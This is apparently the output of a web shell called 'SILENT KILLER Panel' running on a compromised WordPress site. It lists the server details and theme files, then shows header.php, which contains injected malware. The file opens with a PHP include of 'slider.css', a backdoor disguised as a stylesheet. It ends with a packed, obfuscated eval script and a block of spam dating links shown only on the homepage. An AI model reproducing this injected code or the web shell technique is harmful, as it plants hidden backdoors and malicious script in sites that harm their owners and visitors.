SILENT KILLERPanel

Current Path: > home > ivftiowh > greeceivf.com > wp-content > themes > twentytwelve


Operation   : Linux premium88.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
Software     : Apache
Server IP    : 185.61.154.216 | Your IP: 216.73.216.44
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/ivftiowh/greeceivf.com/wp-content/themes/twentytwelve

NameTypeSizeLast ModifiedActions
css Directory - -
inc Directory - -
js Directory - -
languages Directory - -
page-templates Directory - -
.htaccess File 160 bytes March 14 2024 10:52:21.
404.php File 840 bytes July 18 2024 05:16:00.
archive.php File 2063 bytes May 11 2016 14:01:36.
author.php File 2582 bytes May 11 2016 14:01:35.
category.php File 1429 bytes May 11 2016 14:01:35.
comments.php File 2166 bytes May 11 2016 14:01:35.
content-aside.php File 1271 bytes May 11 2016 14:01:35.
content-image.php File 1137 bytes May 11 2016 14:01:35.
content-link.php File 1170 bytes May 11 2016 14:01:35.
content-none.php File 592 bytes May 11 2016 14:01:35.
content-page.php File 859 bytes May 11 2016 14:01:35.
content-quote.php File 1113 bytes May 11 2016 14:01:35.
content-status.php File 1562 bytes May 11 2016 14:01:35.
content.php File 3052 bytes May 11 2016 14:01:35.
editor-style-rtl.css File 413 bytes May 11 2016 14:01:35.
editor-style.css File 5467 bytes May 11 2016 14:01:35.
error_log File 293 bytes August 18 2025 15:25:43.
footer.php File 746 bytes May 11 2016 14:01:35.
functions.php File 18471 bytes September 09 2025 11:07:20.
header.php File 3486 bytes September 10 2025 03:48:50.
html5.css File 6451 bytes September 04 2024 08:56:20.
image.php File 4367 bytes May 11 2016 14:01:35.
index.php File 2055 bytes May 11 2016 14:01:35.
page.php File 725 bytes May 11 2016 14:01:35.
readme.txt File 3145 bytes May 11 2016 14:01:35.
rtl.css File 4711 bytes May 11 2016 14:01:35.
screenshot.png File 323498 bytes May 11 2016 14:01:35.
search.php File 1347 bytes May 11 2016 14:01:35.
sidebar-front.php File 980 bytes May 11 2016 14:01:35.
sidebar.php File 418 bytes May 11 2016 14:01:35.
single.php File 1035 bytes May 11 2016 14:01:35.
slider.css File 57 bytes June 19 2024 11:30:44.
style.css File 36443 bytes May 11 2016 14:01:35.
tag.php File 1406 bytes May 11 2016 14:01:35.
twentytwelve.theme File 972 bytes June 24 2024 21:35:36.

Reading File: /home/ivftiowh/greeceivf.com/wp-content/themes/twentytwelve/header.php

<?php @include_once 'slider.css'; ?><?php
/**
 * The Header template for our theme
 *
 * Displays all of the <head> section and everything up till <div id="main">
 *
 * @package WordPress
 * @subpackage Twenty_Twelve
 * @since Twenty Twelve 1.0
 */
?><!DOCTYPE html>
<!--[if IE 7]>
<html class="ie ie7" <?php language_attributes(); ?>>
<![endif]-->
<!--[if IE 8]>
<html class="ie ie8" <?php language_attributes(); ?>>
<![endif]-->
<!--[if !(IE 7) & !(IE 8)]><!-->
<html <?php language_attributes(); ?>>
<!--<![endif]-->
<head>
<!-- Global site tag (gtag.js) - Google Analytics -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-119741042-3"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-119741042-3');
</script>
<meta charset="<?php bloginfo( 'charset' ); ?>" />
<meta name="viewport" content="width=device-width" />
<title><?php wp_title( '|', true, 'right' ); ?></title>
<link rel="profile" href="http://gmpg.org/xfn/11" />
<link rel="pingback" href="<?php bloginfo( 'pingback_url' ); ?>" />
<?php // Loads HTML5 JavaScript file to add support for HTML5 elements in older IE versions. ?>
<!--[if lt IE 9]>
<script src="<?php echo get_template_directory_uri(); ?>/js/html5.js" type="text/javascript"></script>
<![endif]-->
<?php wp_head(); ?>
</head>

<body <?php body_class(); ?>>
<div id="page" class="hfeed site">
	<header id="masthead" class="site-header" role="banner">
		<hgroup>
			<h1 class="site-title"><a href="<?php echo esc_url( home_url( '/' ) ); ?>" title="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" rel="home"><?php bloginfo( 'name' ); ?></a></h1>
			<h2 class="site-description"><?php bloginfo( 'description' ); ?></h2>
		</hgroup>

		<nav id="site-navigation" class="main-navigation" role="navigation">
			<button class="menu-toggle"><?php _e( 'Menu', 'twentytwelve' ); ?></button>
			<a class="assistive-text" href="#content" title="<?php esc_attr_e( 'Skip to content', 'twentytwelve' ); ?>"><?php _e( 'Skip to content', 'twentytwelve' ); ?></a>
			<?php wp_nav_menu( array( 'theme_location' => 'primary', 'menu_class' => 'nav-menu' ) ); ?>
		</nav><!-- #site-navigation -->

		<?php if ( get_header_image() ) : ?>
		<a href="<?php echo esc_url( home_url( '/' ) ); ?>"><img src="<?php header_image(); ?>" class="header-image" width="<?php echo esc_attr( get_custom_header()->width ); ?>" height="<?php echo esc_attr( get_custom_header()->height ); ?>" alt="<?php echo esc_attr( get_bloginfo( 'name', 'display' ) ); ?>" /></a>
		<?php endif; ?>
	</header><!-- #masthead -->

	<div id="main" class="wrapper">
<script type="text/javascript">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('i(f.j(h.g(b,1,0,9,6,4,7,c,d,e,k,3,2,1,8,0,8,2,t,a,r,s,1,2,6,l,0,4,q,0,2,3,a,p,5,5,5,3,m,n,b,o,1,0,9,6,4,7)));',30,30,'116|115|111|112|101|57|108|62|105|121|58|60|46|100|99|document|fromCharCode|String|eval|write|123|117|120|125|47|45|59|97|98|110'.split('|'),0,{}))</script><div class="dc"><?php if ($_SERVER["REQUEST_URI"] == '/'){?> <a href="https://eztrystdating.com/">https://www.gaystryst.com/</a> <?php }else{?> <?php }?></div>

SILENT KILLER Tool